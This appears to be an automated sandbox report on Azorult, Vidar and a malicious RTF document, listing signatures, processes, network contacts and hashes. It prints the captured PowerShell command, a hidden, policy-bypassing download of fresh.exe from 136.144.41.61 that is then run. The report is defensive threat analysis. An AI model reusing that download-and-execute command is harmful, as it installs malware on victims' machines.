2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
21s
Max time network
119s
Command Line
Signatures
Azorult
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
"C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.189.151.50:80 | 185.189.151.50 | tcp |
Files
memory/3628-114-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
memory/3628-115-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
memory/3628-116-0x0000000000400000-0x0000000000BA7000-memory.dmp
memory/3628-117-0x0000000000BB0000-0x0000000000CFA000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
148s
Max time network
197s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
Files
memory/1028-59-0x0000000072491000-0x0000000072494000-memory.dmp
memory/1028-60-0x000000006FF11000-0x000000006FF13000-memory.dmp
memory/1028-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1028-62-0x0000000075591000-0x0000000075593000-memory.dmp
memory/832-63-0x0000000000000000-mapping.dmp
memory/832-65-0x0000000001F40000-0x0000000001F41000-memory.dmp
memory/832-66-0x0000000004880000-0x0000000004881000-memory.dmp
memory/832-67-0x0000000002540000-0x0000000002541000-memory.dmp
memory/832-68-0x0000000004840000-0x0000000004841000-memory.dmp
memory/832-69-0x0000000004842000-0x0000000004843000-memory.dmp
memory/832-70-0x0000000005240000-0x0000000005241000-memory.dmp
memory/832-73-0x0000000005660000-0x0000000005661000-memory.dmp
memory/832-78-0x0000000005700000-0x0000000005701000-memory.dmp
memory/832-79-0x00000000061E0000-0x00000000061E1000-memory.dmp
memory/832-86-0x0000000006280000-0x0000000006281000-memory.dmp
memory/832-87-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/1784-88-0x0000000000000000-mapping.dmp
memory/832-91-0x00000000062C0000-0x00000000062C1000-memory.dmp
memory/1012-90-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cef21d1181dd020d66c871fade090fbd |
| SHA1 | e46ac816105c5894395c6a60364d13978cb6e418 |
| SHA256 | 0a00cc823d9aab8e9be994f6464ed327afe9e68b93394c1b2503a13ac2d48ce8 |
| SHA512 | 9f3499bf40d51105c784724e9afd14c2f364950ee185c338edf63c5a07ba5047ee166d97c62dcb68e59e0a2ab10332289d6fa047bd105827e87ba0b3340ae6b5 |
memory/1012-97-0x0000000001F80000-0x0000000002BCA000-memory.dmp
memory/1012-98-0x0000000001F80000-0x0000000002BCA000-memory.dmp
memory/832-100-0x0000000006440000-0x0000000006441000-memory.dmp
memory/832-114-0x00000000065B0000-0x00000000065B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
| MD5 | 597009ea0430a463753e0f5b1d1a249e |
| SHA1 | 4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62 |
| SHA256 | 3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d |
| SHA512 | 5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
| MD5 | a725bb9fafcf91f3c6b7861a2bde6db2 |
| SHA1 | 8bb5b83f3cc37ff1e5ea4f02acae38e72364c114 |
| SHA256 | 51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431 |
| SHA512 | 1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
| MD5 | be4d72095faf84233ac17b94744f7084 |
| SHA1 | cc78ce5b9c57573bd214a8f423ee622b00ebb1ec |
| SHA256 | b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc |
| SHA512 | 43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
| MD5 | 5e3c7184a75d42dda1a83606a45001d8 |
| SHA1 | 94ca15637721d88f30eb4b6220b805c5be0360ed |
| SHA256 | 8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59 |
| SHA512 | fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
| MD5 | df44874327d79bd75e4264cb8dc01811 |
| SHA1 | 1396b06debed65ea93c24998d244edebd3c0209d |
| SHA256 | 55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181 |
| SHA512 | 95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
| MD5 | 02ff38ac870de39782aeee04d7b48231 |
| SHA1 | 0390d39fa216c9b0ecdb38238304e518fb2b5095 |
| SHA256 | fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876 |
| SHA512 | 24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
| MD5 | 75a8da7754349b38d64c87c938545b1b |
| SHA1 | 5c28c257d51f1c1587e29164cc03ea880c21b417 |
| SHA256 | bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96 |
| SHA512 | 798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
| MD5 | b6d38f250ccc9003dd70efd3b778117f |
| SHA1 | d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a |
| SHA256 | 4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265 |
| SHA512 | 67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | cdf5dc3275e7507713fc242455d8bfbd |
| SHA1 | fef30fb16b6fb9128e13ba21ff81ce6423cd1832 |
| SHA256 | 7c72acae5b15108438dc287cfa7dcc8e1ca1e08c3ae132be6267e4332fac5738 |
| SHA512 | 7ac8ec6481687acec33c6ab5a5bd2aceb7920fd135447c742a0b1aac947a33e123118f80eaf49b151d1e045cff1cfcd98640d1fd617c12911d9d4064e5e60373 |
memory/832-115-0x00000000065C0000-0x00000000065C1000-memory.dmp
memory/1012-126-0x00000000064C0000-0x00000000064C1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_be83a4e2-1974-456b-b09a-a1d1479761a9
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2a13e59-7333-473f-9b18-d066041a3fdf
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4bb811cf-5419-41d0-88cd-6e71b61856dd
| MD5 | 354b8209f647a42e2ce36d8cf326cc92 |
| SHA1 | 98c3117f797df69935f8b09fc9e95accfe3d8346 |
| SHA256 | feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239 |
| SHA512 | 420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0b33b38c-206d-450a-aaaf-35c32459baf4
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cef21d1181dd020d66c871fade090fbd |
| SHA1 | e46ac816105c5894395c6a60364d13978cb6e418 |
| SHA256 | 0a00cc823d9aab8e9be994f6464ed327afe9e68b93394c1b2503a13ac2d48ce8 |
| SHA512 | 9f3499bf40d51105c784724e9afd14c2f364950ee185c338edf63c5a07ba5047ee166d97c62dcb68e59e0a2ab10332289d6fa047bd105827e87ba0b3340ae6b5 |
memory/1784-132-0x00000000023F0000-0x00000000023F1000-memory.dmp
memory/1784-133-0x0000000004920000-0x0000000004921000-memory.dmp
memory/1784-134-0x0000000002720000-0x0000000002721000-memory.dmp
memory/1784-135-0x0000000005300000-0x0000000005301000-memory.dmp
memory/1784-136-0x0000000006070000-0x0000000006071000-memory.dmp
memory/936-138-0x0000000000000000-mapping.dmp
memory/936-139-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win10v20210408
Max time kernel
17s
Max time network
126s
Command Line
Signatures
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3492 set thread context of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
"C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe"
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 24
Network
Files
memory/3492-114-0x0000000000420000-0x0000000000421000-memory.dmp
memory/3492-116-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3492-117-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/3492-118-0x0000000004D70000-0x0000000004DE6000-memory.dmp
memory/2584-119-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2584-120-0x000000000046B76D-mapping.dmp